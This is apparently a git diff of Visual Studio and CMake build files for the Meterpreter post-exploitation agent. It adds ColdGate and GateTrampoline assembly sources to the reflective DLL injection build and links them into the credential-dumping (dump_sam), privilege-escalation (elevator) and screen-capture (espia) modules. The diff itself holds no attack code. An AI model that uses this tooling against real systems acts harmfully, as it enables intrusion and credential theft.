b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj index ba50be544..dce0c22b2 100644 --- a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj @@ -187,16 +187,28 @@ </Lib> </ItemDefinitionGroup> <ItemGroup> + <ClCompile Include="..\..\source\ReflectiveDLLInjection\dll\src\ColdGate.c" /> <ClCompile Include="..\..\source\ReflectiveDLLInjection\inject\src\GetProcAddressR.c" /> <ClCompile Include="..\..\source\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" /> <ClCompile Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" /> </ItemGroup> <ItemGroup> + <ClInclude Include="..\..\source\ReflectiveDLLInjection\dll\src\ColdGate.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\inject\src\GetProcAddressR.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> diff --git a/c/meterpreter/workspace/dump_sam/CMakeLists.txt b/c/meterpreter/workspace/dump_sam/CMakeLists.txt index 06842a04a..d69b3ded8 100644 --- a/c/meterpreter/workspace/dump_sam/CMakeLists.txt +++ b/c/meterpreter/workspace/dump_sam/CMakeLists.txt @@ -25,7 +25,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj index 15be2cea9..bebb0d00d 100755 --- a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj +++ b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj @@ -56,6 +56,7 @@ </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <ImportGroup Label="ExtensionSettings"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" /> </ImportGroup> <ImportGroup Label="Shared"> </ImportGroup> @@ -112,10 +113,11 @@ <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>false</FunctionLevelLinking> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <SupportJustMyCode>false</SupportJustMyCode> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> @@ -125,6 +127,7 @@ <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention>false</DataExecutionPrevention> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -146,8 +149,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <MultiProcessorCompilation>true</MultiProcessorCompilation> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> @@ -158,6 +162,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <DataExecutionPrevention>false</DataExecutionPrevention> <EntryPointSymbol>DllMain</EntryPointSymbol> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -181,10 +186,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>false</FunctionLevelLinking> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <SupportJustMyCode>false</SupportJustMyCode> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> @@ -194,6 +200,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention>false</DataExecutionPrevention> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -215,8 +222,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <MultiProcessorCompilation>true</MultiProcessorCompilation> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> @@ -227,6 +235,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <DataExecutionPrevention>false</DataExecutionPrevention> <EntryPointSymbol>DllMain</EntryPointSymbol> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -248,8 +257,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </ItemGroup> <ItemGroup> <None Include="..\..\source\dump_sam\dump_sam.def" /> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <FileType>Document</FileType> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> </Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/elevator/CMakeLists.txt b/c/meterpreter/workspace/elevator/CMakeLists.txt index b7a3afd73..e18964f3f 100644 --- a/c/meterpreter/workspace/elevator/CMakeLists.txt +++ b/c/meterpreter/workspace/elevator/CMakeLists.txt @@ -24,7 +24,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${T set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DIR}/plugin.def\"") set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/elevator/elevator.vcxproj b/c/meterpreter/workspace/elevator/elevator.vcxproj index d0b5620f4..749cb53ac 100644 --- a/c/meterpreter/workspace/elevator/elevator.vcxproj +++ b/c/meterpreter/workspace/elevator/elevator.vcxproj @@ -122,7 +122,7 @@ <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <ShowIncludes>false</ShowIncludes> <TreatWarningAsError>true</TreatWarningAsError> @@ -145,6 +145,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -163,7 +164,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <ShowIncludes>false</ShowIncludes> <TreatWarningAsError>true</TreatWarningAsError> @@ -187,6 +188,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -205,7 +207,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <ShowIncludes>false</ShowIncludes> <TreatWarningAsError>true</TreatWarningAsError> @@ -228,6 +230,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,7 +252,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <TreatWarningAsError>true</TreatWarningAsError> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common</AdditionalIncludeDirectories> @@ -288,7 +291,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <TreatWarningAsError>true</TreatWarningAsError> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common</AdditionalIncludeDirectories> @@ -329,7 +332,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <TreatWarningAsError>true</TreatWarningAsError> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common</AdditionalIncludeDirectories> @@ -365,6 +368,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\elevator\namedpipeservice.h" /> <ClInclude Include="..\..\source\elevator\tokendup.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <FileType>Document</FileType> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">ASSEMBLE</PreprocessorDefinitions> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -372,4 +389,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt index 702c7f640..fbd48fd03 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt @@ -39,7 +39,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index aba733413..7f564180d 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -37,6 +37,18 @@ <ClCompile Include="..\..\source\extensions\bofloader\bofloader.c" /> <ClCompile Include="..\..\source\logging\logging.c" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{486B160F-C571-486D-AAC3-CB60CEA7CBDD}</ProjectGuid> <RootNamespace>ext_server_incognito</RootNamespace> @@ -170,10 +182,11 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -226,10 +239,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -281,10 +295,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -340,10 +355,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -400,10 +416,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -459,10 +476,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> diff --git a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt index 01de6126a..a89824aee 100644 --- a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) endif() set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj index 4065c24c6..f4ac0d194 100644 --- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj +++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj @@ -159,6 +159,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -216,6 +217,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -272,6 +274,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -328,6 +331,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -385,6 +389,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -457,6 +463,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\espia\espia.h" /> <ClInclude Include="..\..\source\extensions\espia\screen.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> 